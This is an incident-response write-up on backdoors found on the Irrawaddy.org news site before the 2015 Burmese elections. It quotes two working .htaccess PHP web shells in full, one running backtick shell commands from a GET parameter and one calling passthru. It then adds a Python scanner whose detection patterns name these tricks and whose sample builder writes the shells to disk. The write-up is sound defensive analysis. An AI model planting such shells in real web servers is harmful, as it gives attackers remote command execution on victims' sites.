Fighting Cyber Attacks during the Burmese Elections

7th Nov 15:00 PM – The IP address was involved in the October attacks!

Irrawaddy.org confirms that the very same IP address was involved in the attack on their website on 9 October 2015 by the group “Union of Hacktivists”.

7th Nov 16:30 PM – Looking for backdoors in the website

We received access credentials to look for backdoors in the website. The case is urgent: Election Day starts in less than 12 hours.

7th Nov 17:30 PM – No obvious evidence of malicious activity

Irrawaddy.org tells us they believe there are no clear signs that the site is compromised, as the previous hack attempt was cleaned up by their current hosting provider.

7th Nov 17:52 PM – First backdoor found!

We found the first backdoor in the website. It executes shell commands passed in the URI through the query variable “1”: in PHP, text enclosed in backticks is executed as a shell command.

In feed/.htaccess

# cat feed/.htaccess

Order allow,deny
Allow from all

AddType application/x-httpd-php .htaccess

<?=@`$_GET[1]`?>

7th Nov 19:34 PM – More backdoors…

Two earlier attempts at backdooring the site are found:

wp-content/uploads/2015/01/htaccess (Jan 20 2015)
wp-content/staticfeed/htaccess (Jan 10 2015)

# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^.ht">
Order allow,deny
Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess .gif .phtml .jpeg .png .txt .php5 .php3
<?php echo "n";passthru($_GET['c']." 2>&1");?>
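Both backdoors rely on the same trick: a writable .htaccess (or a dot-less copy under the uploads tree) that maps itself to the PHP handler, optionally lifts Apache's default deny on .ht* files, and then carries a PHP snippet that hands request input to the shell. The scanner below is an added example written for this write-up, not code from the original post or from Irrawaddy.org; it walks a web root for htaccess-like files and reports which of those indicators each one trips. The sample tree it builds is constructed from the listings above, with a benign WordPress rewrite file added for contrast.

```python
import os
import re
import tempfile

# Indicators from the two backdoors above: .htaccess (or image files) mapped to the PHP
# handler, a <Files> block exposing .ht* files, PHP tags, and shell execution on request input.
INDICATORS = {
    "htaccess_as_php": re.compile(r"AddType\s+application/x-httpd-php\b[^\n]*\.htaccess", re.I),
    "image_as_php": re.compile(r"AddType\s+application/x-httpd-php\b[^\n]*\.(gif|jpe?g|png|txt)\b", re.I),
    "ht_files_exposed": re.compile(r'<Files\s+~\s*"\^\.ht"', re.I),
    "php_open_tag": re.compile(r"<\?(php\b|=)", re.I),
    "shell_exec": re.compile(r"\b(passthru|shell_exec|system|exec|popen)\s*\(|`[^`]*\$_(GET|POST|REQUEST)", re.I),
}

def scan_file(path):
    """Return the sorted indicator names found in one file."""
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", errors="replace")
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_webroot(root):
    """Map each suspicious htaccess-like file ('/'-separated relative path) to its indicators."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower() in (".htaccess", "htaccess"):  # dot-less copies were found under wp-content
                full = os.path.join(dirpath, name)
                found = scan_file(full)
                if found:
                    hits[os.path.relpath(full, root).replace(os.sep, "/")] = found
    return hits

def build_sample_webroot():
    """Constructed sample tree: a benign WordPress .htaccess plus the two shells quoted above."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        ".htaccess": "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteRule ^index\\.php$ - [L]\n</IfModule>\n",
        "feed/.htaccess": "Order allow,deny\nAllow from all\nAddType application/x-httpd-php .htaccess\n<?=@`$_GET[1]`?>\n",
        "wp-content/uploads/2015/01/htaccess": (
            '<Files ~ "^.ht">\nOrder allow,deny\nAllow from all\n</Files>\n'
            "AddType application/x-httpd-php .htaccess .gif .phtml .jpeg .png .txt .php5 .php3\n"
            "<?php echo \"\\n\";passthru($_GET['c'].\" 2>&1\");?>\n"),
    }
    for rel, body in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root
```

Run `scan_webroot("/path/to/webroot")` against a real document root; any hit on `htaccess_as_php` or `shell_exec` deserves a manual look, while `image_as_php` alone is also worth review because it lets uploaded images run as PHP.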